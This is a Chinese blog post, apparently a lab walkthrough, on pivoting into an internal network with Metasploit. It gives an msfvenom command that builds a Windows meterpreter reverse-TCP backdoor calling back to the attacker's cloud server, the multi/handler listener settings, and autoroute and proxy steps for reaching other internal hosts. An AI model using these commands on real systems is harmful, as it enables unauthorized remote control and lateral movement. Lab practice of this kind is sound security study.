内网渗透(一)反向代理实现外网访问到内网

准备工作:

        两台在同一内网的虚拟机(这里是192.168.3.25和3.29,其中25联网),其中一台可以访问外网,云服务器一台作为攻击机,同时作为跳板实现让主机进行连接进行访问其内网。

一、攻击机首先取得一台通外网的一台内网虚拟机(称为a虚拟机)的权限

        攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。

        msfvenom -p windows/meterpreter/reverser_tcp  LHOST=你的云服务器ip  LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。

上线前需要在服务器上msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set lhost 0.0.0.0
set lport 3333

 

点击后门文件进行上线。

 上线成功

二、开启节点,开启代理端口(服务器端操作)

开启路由节点:run post/multi/manage/autoroute

 开启代理端口(下面端口1122):

三、主机进行代理,访问其内网。(这里是1133 不用管 填与上面一样的就行)

添加代理规则浏览器软件进行访问

 访问内网

 总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。

我猜肯定有人问取得了a主机的权限,也可以和另一台虚拟机进行通讯,那为什么要开隧道。因为这个通讯仅限于在msf中,不能用平时的渗透工具对其另一台的内网进行渗透。所以我们才这样做,实现可以用各种渗透工具进行测试。

  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值